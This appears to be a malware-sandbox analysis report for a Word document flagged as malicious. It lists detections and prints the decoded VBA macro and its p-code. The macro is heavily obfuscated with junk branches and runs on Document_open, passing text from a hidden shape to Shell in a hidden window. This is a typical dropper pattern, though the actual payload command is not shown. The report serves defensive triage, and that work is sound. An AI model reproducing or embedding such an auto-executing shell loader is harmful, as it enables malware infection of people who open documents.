MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Dksu-6773449-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dksu-6773449-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
HnBKEduKnaPczXkvJG = Hex(vdtAuqsvdzWpKfzRs) SPVRYNft = Array(KiINDsQ, LXiPSr, HINijq, [Interaction].Shell(FiXWk, cqGGmGRBaIp), zrnBSJbPi) Select Case jXJcKUPaONYZsMpp -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23973 bytes |
SHA-256: e5031ff0f649c6ea7e8262186e80546783f7d562f48eff03b412a5be88b9f0ef |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
203 of 254 identifiers look randomly generated (e.g. 'WmiAzaaXsKvAXjlBNfuszOcU') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XKkKMWnks"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case akvXRXzVfDvzMLN
Case 236556644
WmiAzaaXsKvAXjlBNfuszOcU = ChrB(160698433 / ChrB(200003567))
RpRzMqlznuHaJUzZMCVI = JzwjSrCIJObVzJiaLi
Case 60258143
izHFElXwoQRDWGHsSSuzj = 270453807
jfFMKRwAUMWoMpscjTDT = 297863377
End Select
Set YzrBpHsnJCtTbZzZMjqPzqzR = CZqOffVkjHFVJcrIjCUusOTc
GXddzhzZFmhBZiW = Hex(jrStDDEwHQofWDoGOGZ)
Select Case jFwjdBtcIzEMDqwsc
Case 246578317
GjIuVbjbRZUZAPVEPHYFXiT = ChrB(134686839 / ChrB(288720066))
KmWILOfjlhaKcIw = cDnZEzimilDfYcNoCPQ
Case 307683974
INGuRdniEiPJwBQ = 214323853
CNDkZaKzLJTmHNsBV = 127793750
End Select
Set hfnTuIdGnWbazHkNCrVjnv = FUTszRXIbiaznOuIcwTWcjiW
XApKAkBljhzaQjpPOzsX = Hex(zwIisnUZSWlzNZQ)
Select Case luzrzOAVUBqBmW
Case 217819116
JIGZwLwAaflUcaZ = ChrB(291974141 / ChrB(305750612))
ZSfKGJjuEsItHtju = OjsFZwwRUdjttbwGYz
Case 93044754
zCwsEHEsjYrohCLJCIz = 137569956
tmjABKQKniwRVXMmzAStD = 239717993
End Select
Set lsLqQpEQztqGPQsDznitpuWL = zWCHhbfIrvIpTAViSzYf
zVHzVFVqGqWALRSCI = Hex(RLzYVkOdnNLXvzjNB)
Select Case oOlBflsBqiSoTjrjQH
Case 311198002
DEoUadmCHhUIQiaRrENBPwXH = ChrB(226596555 / ChrB(134662075))
wJNAzjHSjZQbCzqtJNKYkJZp = ttjEjhmFhntthVYI
Case 104057553
sadLCZEOtYwLpjYoFqaNDr = 197752693
ULwAcrlPVShOihqHAR = 261037217
End Select
Set JVzKVsPihBnAwHqq = EmCnjqXCJGYzTNlEQMzN
ikbChTfhSbqziwfladfaIL = Hex(riOoCvjurcqZCakwXrUrf)
Set KMVJSkEmp = Shapes("kVLWwtU").TextFrame
Select Case UDCnBJNVJTlYLiKTolj
Case 167676244
VNwzViiIFmRkXjtw = ChrB(292334785 / ChrB(251593489))
kDMlZHChjsErQzR = pGnjafMDhToouRUwwcoGIcWs
Case 122336042
CQAuBmFkDsEGjF = 284071690
DFTOmOXItnJLqMj = 313351443
End Select
Set ZdwDnSCiKNcrswjP = YQZDNntsBNduuqJJsGcuGQnR
cBuQArZvrnSWJLpDKlFY = Hex(PWTiApGUtIdIXlmwbAVDwC)
FiXWk = KMVJSkEmp.TextRange.Text + NibiACTb + oOmaDEj + jumrvih + VoMTcvR + XtATk + czdwQi + XCYwT + HwzACsw + MuwWEALz + whqjP
Select Case dzMtRXVzdaBCVmUA
Case 209718388
WtYVanNKQcrpdlOwifz = ChrB(195534401 / ChrB(291944692))
rJLknEwYqhWXZJnIXZjHGtGo = QoXDoCCjZCPKqAILsmJTGMEL
Case 174359973
YzkqzCXnXQbVBiU = 287130203
HYwhYXwOHwUqDjLdjiEvjEMm = 15673045
End Select
Set sjWkfzOMzncazZobqGCz = hPsVAPwQCLLfvfMrWR
brlYAFiiGHOGkEJKUi = Hex(fjSwvbRvDuckTohVc)
Select Case EhfAJjRCAtDaOzfKwiPZOIm
Case 207439127
zrDhXNpCQVHlmzmsjktp = ChrB(270850359 / ChrB(72899315))
jVPbztfwuzTLsOVcf = XwcYZLlcjhXtqrma
Case 133550347
HlqIkYMlTludLHNb = 113693785
oLvDqXMwYBJbYRuJ = 137852836
End Select
Set XPODLnsziDWPfOaalJPDvTv = AKcrNcjBnUECzkzILqoJbI
uBwjktQzETcDALAmGT = Hex(cLKYcBJHsFimKsohqP)
Select Case XLCwMhFtIGvALlumYrGFO
Case 167842816
cmjIjZsoJKuAiPGW = ChrB(335607599 / ChrB(62623650))
irOzRBNlSiKUVzBZKfZWU = SlpQlLWSUHviuSOmP
Case 46387212
naKzpZChpwqZnPPZcJ = 8190475
BOzJDYqDiLXQSAjpI = 249558263
End Select
Set rjdhWdhIPftldNrUZaAwQjzw = YZHmiaRrJKjXhdfVQaXp
uDajHOHpiIjfCzEaWhF = Hex(uTDKwrzVbAIbJFiWjGa)
Select Case znQvtuGrdSzfubYWdTV
Case 234942729
FXXYpvuRaShzLVVYjpnIWpXj = ChrB(339963495 / ChrB(166348293))
CTIwiHbtPtXDzL = DAPijFCzwdibcQAqYQs
Case 292470696
RWDpkcFfJmnwvlXRRqwzWLSw = 211220598
cPDwmGTcmdMswdzRnruijfcY = 48842844
End Select
Set wsbFEGJkzpcLzjdTzuE = rTCEYaBBSznirMKaBjZ
iOdHobsNBNjiTii = Hex(qWjdEISCBwTmVCRSUzpd)
Select Case DXQWKuXmsCoXhNtBilY
Case 305272300
hzCjDAsiajwYXPKdswzuG = ChrB(341375433 / ChrB(334505061))
jfDzicilCoVZOqHufER = qwKwjYloYzfizdAXws
Case 26108487
FNWitlPBpFPChfihVFQGqpMC = 64387881
ZkqjzmATOdbcFwIkzTjcAT = 311368927
End Select
Set CrbzHPATYFLiLFIcB = REGtASzGqsSjnGpYh
KCLwcHDzmdZtLHb = Hex(BqMIrJzBZHBrREpmYCRwC)
Select Case PhOoZocwBJDsqOYvnYPzkSjp
Case 63378988
wwEiJunWiXYIjv = ChrB(124471444 / ChrB(134907370))
DiDzwkrjNEaNwwY = WrjrXAJETkAXirTjPMfH
Case 37752187
ALMwvqNIhZzdKDm = 189044073
DYzdMjUBVktwkSQYQrUfY = 31755027
End Select
Set rLCaYBhQundciGcnbs = ZFTKzHiEuLRzKwFHRJJwAoUz
GphSnDsmbfNXBETp = Hex(mEcpSiczLiSwwklUzqRBmHHY)
Const cqGGmGRBaIp = 0
Select Case ZfcEtAtHDFVEupnIzncNuQFD
Case 217416729
QuiiLtnOJlhMrEDsBmwhGDCC = ChrB(223592742 / ChrB(264600916))
SDJaYXwjwZVtcQfjCalwX = BOSFzqNsfAXIVKA
Case 73516306
puUETjsVRaWAbwr = 81339528
BuHSXGWGtVWTuUjr = 114500813
End Select
Set BCEiiZjhPrsEDfwLJFDqRoww = KVCWFpIKAqJFTLhjpqi
oRrWjLbnbiNEGIXDh = Hex(KCjuDonFqtVHbzUj)
Select Case oskdrlVBatdbEojijPERwIn
Case 59195507
ijTARUBYwwrwYwLi = ChrB(99893497 / ChrB(50990957))
jmwVNJtFFvvjFbSIBBBI = cDFppjLSsijAIcYkNGq
Case 157190802
vcCSmXFoJjNzFEjsf = 158599043
imMNMfwwuYovKkKjbCWC = 62194031
End Select
Set iiBVBDXprhiNpcj = qnpYLPVlCOvYIqIVT
IdLqitaFjGNzvhzMLjNl = Hex(ONQTmHzhAYNtMUFDAIvzGjP)
Select Case rFzRrDqibvJZhCO
Case 125214227
VcoJEzFQoRjhqBWp = ChrB(179476245 / ChrB(177979948))
FwsSfzwGPqGLwOzMi = wmFrACmHzktmjFbANOcJIKG
Case 297835314
ZhGnSrpswioJNzpjYBNMcH = 7836944
wAkkUimjMBbVfTitEtkan = 280686115
End Select
Set RmdkItjNSjXrSH = YQsIzLWUBEWUIiX
vFASzrwdmfnIoIcMlzV = Hex(hftovSbflZYivGblSo)
Select Case iVzdCGwTfiwUEYQjNqoTtWT
Case 126174155
EzUDjzzBlLGFZLvrrANEKfn = ChrB(127090805 / ChrB(225388420))
joVzMCimwGbPwjBTSMKbo = sbCWFOjZMBVwPIflzDam
Case 87860188
PbBiDqMaIGtFwtzqwQFYta = 301789394
UtnjMGBBREMaUbLpMmsPEJMl = 263639742
End Select
Set HKjovphBJJDfNBF = nrhWVVFPMHhivKhCsDzqUdJ
sSRBmjYrJMWUERnmFR = Hex(nHCGwbBmKCOXKiKiDDD)
Select Case QKVhDhYAlAjnSwqutNTC
Case 62305173
rDnJiutDlDAiKHSGcQT = ChrB(89234109 / ChrB(224486096))
owDBOQkNVFTrSSutzdGhOjm = njbnlDjvqzOoFhfdSYiuP
Case 123240849
zLiQpHAiILTNfozbSWXBVE = 39311564
SzcOqzsUUucbCmtoqSFdmT = 2585216
End Select
Set VwQYsRTvFvwsiloKTzslMV = fciKCzcBwzntthTcDah
HnBKEduKnaPczXkvJG = Hex(vdtAuqsvdzWpKfzRs)
SPVRYNft = Array(KiINDsQ, LXiPSr, HINijq, [Interaction].Shell(FiXWk, cqGGmGRBaIp), zrnBSJbPi)
Select Case jXJcKUPaONYZsMpp
Case 195121298
OXCwlSllQrjDEXCq = ChrB(6303831 / ChrB(253205407))
iQULChrAainTTOPjbKhmq = ZDXtKIAXBLDFzutLzRuSLDd
Case 158893617
porajTAtnqQnIXiz = 21737732
cQOOUmPLQrXfVazjVUJwV = 286803015
End Select
Set LMEcYqtLSIVBHw = UEKUDIWHUqocCOqGLkN
CQKrVWjFWzZrhu = Hex(EmAoupEjmkOrwbBJQuvXDuTz)
Select Case EiPQHzJccTiVMK
Case 297113908
OqiJEbrIUBwpOnFrWAvcXp = ChrB(193662295 / ChrB(134650969))
AcudRNYrHSGiNzdqHwFBUOoO = wLOQQZNNKDwwiCoazHUwJJ
Case 8294436
lQsXTfmnjqTCJbqtt = 132767218
wiuctRbWHUPioK = 320562425
End Select
Set AjpuiQLQoilQWQaEoGFn = owFrIfTQLirMwqNEZYfTdnL
KzqtLpiFJnMhjCWlrAdD = Hex(DaZMAPiaTNAnZhIoZEWwmDI)
Select Case CRAipWRLFwrqnDpKblljGkRY
Case 198034093
qVcFCDziESvHBKwFRtA = ChrB(207792625 / ChrB(218415409))
adDckSpRAcENjwiAv = qJzXOUjalBTYXwuXuwBZSh
Case 270835940
STCniCWQzMpXSDOjtKhnwb = 28387225
TIBkzVUIUNFvRvw = 231740319
End Select
Set CaLJXFqkSjIABoqPzUVA = RcsjCFwTRzNwJvBtwvCKzj
LITZOjUbajrlzScUAsRAjv = Hex(rsoVAYTpmknjXj)
Select Case iSmKAozJiDAfGHWA
Case 207289802
UzwpVNWuiYZBKKwnjcuU = ChrB(294053966 / ChrB(288508896))
hCmjIUcBsOQcIOtwZoFKY = jspjSXtFKncQRnihNaBXj
Case 256224758
ipZqfUjmhJzVtqcCEHmDcAs = 323986837
NsbfIBDtwHqthOl = 199805237
End Select
Set uHTRpqlYzQujSi = bkRcFHZItbvjmIXtBZbFkdoY
qHLkJKfYsRzwIZ = Hex(VwZqtGwPZXsJqcMwwsbOAOX)
End Sub
' Processing file: /tmp/qstore_9eje273r
' ===============================================================================
' Module streams:
' Macros/VBA/XKkKMWnks - 13502 bytes
' Line #0:
' FuncDefn (Private Sub Document_open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld akvXRXzVfDvzMLN
' SelectCase
' Line #3:
' LitDI4 0x9164 0x0E19
' Case
' CaseDone
' Line #4:
' LitDI4 0x1041 0x0994
' LitDI4 0xCFEF 0x0BEB
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St WmiAzaaXsKvAXjlBNfuszOcU
' Line #5:
' Ld JzwjSrCIJObVzJiaLi
' St RpRzMqlznuHaJUzZMCVI
' Line #6:
' LitDI4 0x775F 0x0397
' Case
' CaseDone
' Line #7:
' LitDI4 0xCC2F 0x101E
' St izHFElXwoQRDWGHsSSuzj
' Line #8:
' LitDI4 0x08D1 0x11C1
' St jfFMKRwAUMWoMpscjTDT
' Line #9:
' EndSelect
' Line #10:
' SetStmt
' Ld CZqOffVkjHFVJcrIjCUusOTc
' Set YzrBpHsnJCtTbZzZMjqPzqzR
' Line #11:
' Ld jrStDDEwHQofWDoGOGZ
' ArgsLd Hex 0x0001
' St GXddzhzZFmhBZiW
' Line #12:
' Ld jFwjdBtcIzEMDqwsc
' SelectCase
' Line #13:
' LitDI4 0x7C8D 0x0EB2
' Case
' CaseDone
' Line #14:
' LitDI4 0x2877 0x0807
' LitDI4 0x84C2 0x1135
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St GjIuVbjbRZUZAPVEPHYFXiT
' Line #15:
' Ld cDnZEzimilDfYcNoCPQ
' St KmWILOfjlhaKcIw
' Line #16:
' LitDI4 0xE286 0x1256
' Case
' CaseDone
' Line #17:
' LitDI4 0x528D 0x0CC6
' St INGuRdniEiPJwBQ
' Line #18:
' LitDI4 0xFA56 0x079D
' St CNDkZaKzLJTmHNsBV
' Line #19:
' EndSelect
' Line #20:
' SetStmt
' Ld FUTszRXIbiaznOuIcwTWcjiW
' Set hfnTuIdGnWbazHkNCrVjnv
' Line #21:
' Ld zwIisnUZSWlzNZQ
' ArgsLd Hex 0x0001
' St XApKAkBljhzaQjpPOzsX
' Line #22:
' Ld luzrzOAVUBqBmW
' SelectCase
' Line #23:
' LitDI4 0xA7EC 0x0CFB
' Case
' CaseDone
' Line #24:
' LitDI4 0x2BFD 0x1167
' LitDI4 0x6254 0x1239
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St JIGZwLwAaflUcaZ
' Line #25:
' Ld OjsFZwwRUdjttbwGYz
' St ZSfKGJjuEsItHtju
' Line #26:
' LitDI4 0xC012 0x058B
' Case
' CaseDone
' Line #27:
' LitDI4 0x26A4 0x0833
' St zCwsEHEsjYrohCLJCIz
' Line #28:
' LitDI4 0xCE69 0x0E49
' St tmjABKQKniwRVXMmzAStD
' Line #29:
' EndSelect
' Line #30:
' SetStmt
' Ld zWCHhbfIrvIpTAViSzYf
' Set lsLqQpEQztqGPQsDznitpuWL
' Line #31:
' Ld RLzYVkOdnNLXvzjNB
' ArgsLd Hex 0x0001
' St zVHzVFVqGqWALRSCI
' Line #32:
' Ld oOlBflsBqiSoTjrjQH
' SelectCase
' Line #33:
' LitDI4 0x8132 0x128C
' Case
' CaseDone
' Line #34:
' LitDI4 0x96CB 0x0D81
' LitDI4 0xC7BB 0x0806
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St DEoUadmCHhUIQiaRrENBPwXH
' Line #35:
' Ld ttjEjhmFhntthVYI
' St wJNAzjHSjZQbCzqtJNKYkJZp
' Line #36:
' LitDI4 0xCAD1 0x0633
' Case
' CaseDone
' Line #37:
' LitDI4 0x7775 0x0BC9
' St sadLCZEOtYwLpjYoFqaNDr
' Line #38:
' LitDI4 0x1CA1 0x0F8F
' St ULwAcrlPVShOihqHAR
' Line #39:
' EndSelect
' Line #40:
' SetStmt
' Ld EmCnjqXCJGYzTNlEQMzN
' Set JVzKVsPihBnAwHqq
' Line #41:
' Ld riOoCvjurcqZCakwXrUrf
' ArgsLd Hex 0x0001
' St ikbChTfhSbqziwfladfaIL
' Line #42:
' SetStmt
' LitStr 0x0007 "kVLWwtU"
' ArgsLd Shapes 0x0001
' MemLd TextFrame
' Set KMVJSkEmp
' Line #43:
' Ld UDCnBJNVJTlYLiKTolj
' SelectCase
' Line #44:
' LitDI4 0x8954 0x09FE
' Case
' CaseDone
' Line #45:
' LitDI4 0xACC1 0x116C
' LitDI4 0x0311 0x0EFF
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St VNwzViiIFmRkXjtw
' Line #46:
' Ld pGnjafMDhToouRUwwcoGIcWs
' St kDMlZHChjsErQzR
' Line #47:
' LitDI4 0xB32A 0x074A
' Case
' CaseDone
' Line #48:
' LitDI4 0x970A 0x10EE
' St CQAuBmFkDsEGjF
' Line #49:
' LitDI4 0x5D13 0x12AD
' St DFTOmOXItnJLqMj
' Line #50:
' EndSelect
' Line #51:
' SetStmt
' Ld YQZDNntsBNduuqJJsGcuGQnR
' Set ZdwDnSCiKNcrswjP
' Line #52:
' Ld PWTiApGUtIdIXlmwbAVDwC
' ArgsLd Hex 0x0001
' St cBuQArZvrnSWJLpDKlFY
' Line #53:
' Ld KMVJSkEmp
' MemLd TextRange
' MemLd Text
' Ld NibiACTb
' Add
' Ld oOmaDEj
' Add
' Ld jumrvih
' Add
' Ld VoMTcvR
' Add
' Ld XtATk
' Add
' Ld czdwQi
' Add
' Ld XCYwT
' Add
' Ld HwzACsw
' Add
' Ld MuwWEALz
' Add
' Ld whqjP
' Add
' St FiXWk
' Line #54:
' Ld dzMtRXVzdaBCVmUA
' SelectCase
' Line #55:
' LitDI4 0x0C74 0x0C80
' Case
' CaseDone
' Line #56:
' LitDI4 0x9E41 0x0BA7
' LitDI4 0xB8F4 0x1166
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St WtYVanNKQcrpdlOwifz
' Line #57:
' Ld QoXDoCCjZCPKqAILsmJTGMEL
' St rJLknEwYqhWXZJnIXZjHGtGo
' Line #58:
' LitDI4 0x85A5 0x0A64
' Case
' CaseDone
' Line #59:
' LitDI4 0x425B 0x111D
' St YzkqzCXnXQbVBiU
' Line #60:
' LitDI4 0x26D5 0x00EF
' St HYwhYXwOHwUqDjLdjiEvjEMm
' Line #61:
' EndSelect
' Line #62:
' SetStmt
' Ld hPsVAPwQCLLfvfMrWR
' Set sjWkfzOMzncazZobqGCz
' Line #63:
' Ld fjSwvbRvDuckTohVc
' ArgsLd Hex 0x0001
' St brlYAFiiGHOGkEJKUi
' Line #64:
' Ld EhfAJjRCAtDaOzfKwiPZOIm
' SelectCase
' Line #65:
' LitDI4 0x4517 0x0C5D
' Case
' CaseDone
' Line #66:
' LitDI4 0xD937 0x1024
' LitDI4 0x5AF3 0x0458
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St zrDhXNpCQVHlmzmsjktp
' Line #67:
' Ld XwcYZLlcjhXtqrma
' St jVPbztfwuzTLsOVcf
' Line #68:
' LitDI4 0xD10B 0x07F5
' Case
' CaseDone
' Line #69:
' LitDI4 0xD459 0x06C6
' St HlqIkYMlTludLHNb
' Line #70:
' LitDI4 0x77A4 0x0837
' St oLvDqXMwYBJbYRuJ
' Line #71:
' EndSelect
' Line #72:
' SetStmt
' Ld AKcrNcjBnUECzkzILqoJbI
' Set XPODLnsziDWPfOaalJPDvTv
' Line #73:
' Ld cLKYcBJHsFimKsohqP
' ArgsLd Hex 0x0001
' St uBwjktQzETcDALAmGT
' Line #74:
' Ld XLCwMhFtIGvALlumYrGFO
' SelectCase
' Line #75:
' LitDI4 0x1400 0x0A01
' Case
' CaseDone
' Line #76:
' LitDI4 0xF72F 0x1400
' LitDI4 0x8FA2 0x03BB
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St cmjIjZsoJKuAiPGW
' Line #77:
' Ld SlpQlLWSUHviuSOmP
' St irOzRBNlSiKUVzBZKfZWU
' Line #78:
' LitDI4 0xD00C 0x02C3
' Case
' CaseDone
' Line #79:
' LitDI4 0xFA0B 0x007C
' St naKzpZChpwqZnPPZcJ
' Line #80:
' LitDI4 0xF4F7 0x0EDF
' St BOzJDYqDiLXQSAjpI
' Line #81:
' EndSelect
' Line #82:
' SetStmt
' Ld YZHmiaRrJKjXhdfVQaXp
' Set rjdhWdhIPftldNrUZaAwQjzw
' Line #83:
' Ld uTDKwrzVbAIbJFiWjGa
' ArgsLd Hex 0x0001
' St uDajHOHpiIjfCzEaWhF
' Line #84:
' Ld znQvtuGrdSzfubYWdTV
' SelectCase
' Line #85:
' LitDI4 0xF109 0x0E00
' Case
' CaseDone
' Line #86:
' LitDI4 0x6E67 0x1443
' LitDI4 0x4605 0x09EA
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St FXXYpvuRaShzLVVYjpnIWpXj
' Line #87:
' Ld DAPijFCzwdibcQAqYQs
' St CTIwiHbtPtXDzL
' Line #88:
' LitDI4 0xBFA8 0x116E
' Case
' CaseDone
' Line #89:
' LitDI4 0xF876 0x0C96
' St RWDpkcFfJmnwvlXRRqwzWLSw
' Line #90:
' LitDI4 0x485C 0x02E9
' St cPDwmGTcmdMswdzRnruijfcY
' Line #91:
' EndSelect
' Line #92:
' SetStmt
' Ld rTCEYaBBSznirMKaBjZ
' Set wsbFEGJkzpcLzjdTzuE
' Line #93:
' Ld qWjdEISCBwTmVCRSUzpd
' ArgsLd Hex 0x0001
' St iOdHobsNBNjiTii
' Line #94:
' Ld DXQWKuXmsCoXhNtBilY
' SelectCase
' Line #95:
' LitDI4 0x15EC 0x1232
' Case
' CaseDone
' Line #96:
' LitDI4 0xF9C9 0x1458
' LitDI4 0x2465 0x13F0
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St hzCjDAsiajwYXPKdswzuG
' Line #97:
' Ld qwKwjYloYzfizdAXws
' St jfDzicilCoVZOqHufER
' Line #98:
' LitDI4 0x6247 0x018E
' Case
' CaseDone
' Line #99:
' LitDI4 0x7B29 0x03D6
' St FNWitlPBpFPChfihVFQGqpMC
' Line #100:
' LitDI4 0x1CDF 0x128F
' St ZkqjzmATOdbcFwIkzTjcAT
' Line #101:
' EndSelect
' Line #102:
' SetStmt
' Ld REGtASzGqsSjnGpYh
' Set CrbzHPATYFLiLFIcB
' Line #103:
' Ld BqMIrJzBZHBrREpmYCRwC
' ArgsLd Hex 0x0001
' St KCLwcHDzmdZtLHb
' Line #104:
' Ld PhOoZocwBJDsqOYvnYPzkSjp
' SelectCase
' Line #105:
' LitDI4 0x162C 0x03C7
' Case
' CaseDone
' Line #106:
' LitDI4 0x4894 0x076B
' LitDI4 0x85EA 0x080A
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St wwEiJunWiXYIjv
' Line #107:
' Ld WrjrXAJETkAXirTjPMfH
' St DiDzwkrjNEaNwwY
' Line #108:
' LitDI4 0x0D7B 0x0240
' Case
' CaseDone
' Line #109:
' LitDI4 0x9569 0x0B44
' St ALMwvqNIhZzdKDm
' Line #110:
' LitDI4 0x8B13 0x01E4
' St DYzdMjUBVktwkSQYQrUfY
' Line #111:
' EndSelect
' Line #112:
' SetStmt
' Ld ZFTKzHiEuLRzKwFHRJJwAoUz
' Set rLCaYBhQundciGcnbs
' Line #113:
' Ld mEcpSiczLiSwwklUzqRBmHHY
' ArgsLd Hex 0x0001
' St GphSnDsmbfNXBETp
' Line #114:
' Dim (Const)
' LitDI2 0x0000
' VarDefn cqGGmGRBaIp
' Line #115:
' Ld ZfcEtAtHDFVEupnIzncNuQFD
' SelectCase
' Line #116:
' LitDI4 0x8419 0x0CF5
' Case
' CaseDone
' Line #117:
' LitDI4 0xC126 0x0D53
' LitDI4 0x7D54 0x0FC5
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St QuiiLtnOJlhMrEDsBmwhGDCC
' Line #118:
' Ld BOSFzqNsfAXIVKA
' St SDJaYXwjwZVtcQfjCalwX
' Line #119:
' LitDI4 0xC512 0x0461
' Case
' CaseDone
' Line #120:
' LitDI4 0x2488 0x04D9
' St puUETjsVRaWAbwr
' Line #121:
' LitDI4 0x24CD 0x06D3
' St BuHSXGWGtVWTuUjr
' Line #122:
' EndSelect
' Line #123:
' SetStmt
' Ld KVCWFpIKAqJFTLhjpqi
' Set BCEiiZjhPrsEDfwLJFDqRoww
' Line #124:
' Ld KCjuDonFqtVHbzUj
' ArgsLd Hex 0x0001
' St oRrWjLbnbiNEGIXDh
' Line #125:
' Ld oskdrlVBatdbEojijPERwIn
' SelectCase
' Line #126:
' LitDI4 0x4073 0x0387
' Case
' CaseDone
' Line #127:
' LitDI4 0x40F9 0x05F4
' LitDI4 0x0F6D 0x030A
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St ijTARUBYwwrwYwLi
' Line #128:
' Ld cDFppjLSsijAIcYkNGq
' St jmwVNJtFFvvjFbSIBBBI
' Line #129:
' LitDI4 0x8A92 0x095E
' Case
' CaseDone
' Line #130:
' LitDI4 0x0783 0x0974
' St vcCSmXFoJjNzFEjsf
' Line #131:
' LitDI4 0x016F 0x03B5
' St imMNMfwwuYovKkKjbCWC
' Line #132:
' EndSelect
' Line #133:
' SetStmt
' Ld qnpYLPVlCOvYIqIVT
' Set iiBVBDXprhiNpcj
' Line #134:
' Ld ONQTmHzhAYNtMUFDAIvzGjP
' ArgsLd Hex 0x0001
' St IdLqitaFjGNzvhzMLjNl
' Line #135:
' Ld rFzRrDqibvJZhCO
' SelectCase
' Line #136:
' LitDI4 0x9E13 0x0776
' Case
' CaseDone
' Line #137:
' LitDI4 0x9715 0x0AB2
' LitDI4 0xC22C 0x0A9B
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St VcoJEzFQoRjhqBWp
' Line #138:
' Ld wmFrACmHzktmjFbANOcJIKG
' St FwsSfzwGPqGLwOzMi
' Line #139:
' LitDI4 0x9B32 0x11C0
' Case
' CaseDone
' Line #140:
' LitDI4 0x9510 0x0077
' St ZhGnSrpswioJNzpjYBNMcH
' Line #141:
' LitDI4 0xEE23 0x10BA
' St wAkkUimjMBbVfTitEtkan
' Line #142:
' EndSelect
' Line #143:
' SetStmt
' Ld YQsIzLWUBEWUIiX
' Set RmdkItjNSjXrSH
' Line #144:
' Ld hftovSbflZYivGblSo
' ArgsLd Hex 0x0001
' St vFASzrwdmfnIoIcMlzV
' Line #145:
' Ld iVzdCGwTfiwUEYQjNqoTtWT
' SelectCase
' Line #146:
' LitDI4 0x43CB 0x0785
' Case
' CaseDone
' Line #147:
' LitDI4 0x4075 0x0793
' LitDI4 0x2784 0x0D6F
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St EzUDjzzBlLGFZLvrrANEKfn
' Line #148:
' Ld sbCWFOjZMBVwPIflzDam
' St joVzMCimwGbPwjBTSMKbo
' Line #149:
' LitDI4 0xA3DC 0x053C
' Case
' CaseDone
' Line #150:
' LitDI4 0xF0D2 0x11FC
' St PbBiDqMaIGtFwtzqwQFYta
' Line #151:
' LitDI4 0xD2BE 0x0FB6
' St UtnjMGBBREMaUbLpMmsPEJMl
' Line #152:
' EndSelect
' Line #153:
' SetStmt
' Ld nrhWVVFPMHhivKhCsDzqUdJ
' Set HKjovphBJJDfNBF
' Line #154:
' Ld nHCGwbBmKCOXKiKiDDD
' ArgsLd Hex 0x0001
' St sSRBmjYrJMWUERnmFR
' Line #155:
' Ld QKVhDhYAlAjnSwqutNTC
' SelectCase
' Line #156:
' LitDI4 0xB395 0x03B6
' Case
' CaseDone
' Line #157:
' LitDI4 0x9ABD 0x0551
' LitDI4 0x62D0 0x0D61
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St rDnJiutDlDAiKHSGcQT
' Line #158:
' Ld njbnlDjvqzOoFhfdSYiuP
' St owDBOQkNVFTrSSutzdGhOjm
' Line #159:
' LitDI4 0x8191 0x0758
' Case
' CaseDone
' Line #160:
' LitDI4 0xD8CC 0x0257
' St zLiQpHAiILTNfozbSWXBVE
' Line #161:
' LitDI4 0x7280 0x0027
' St zLiQpHAiILTNfozbSWXBVE
' Line #162:
' EndSelect
' Line #163:
' SetStmt
' Ld VwQYsRTvFvwsiloKTzslMV
' Set SzcOqzsUUucbCmtoqSFdmT
' Line #164:
' Ld HnBKEduKnaPczXkvJG
' ArgsLd Hex 0x0001
' St fciKCzcBwzntthTcDah
' Line #165:
' Ld SPVRYNft
' Ld KiINDsQ
' Ld LXiPSr
' Ld FiXWk
' Ld cqGGmGRBaIp
' Ld [HINijq]
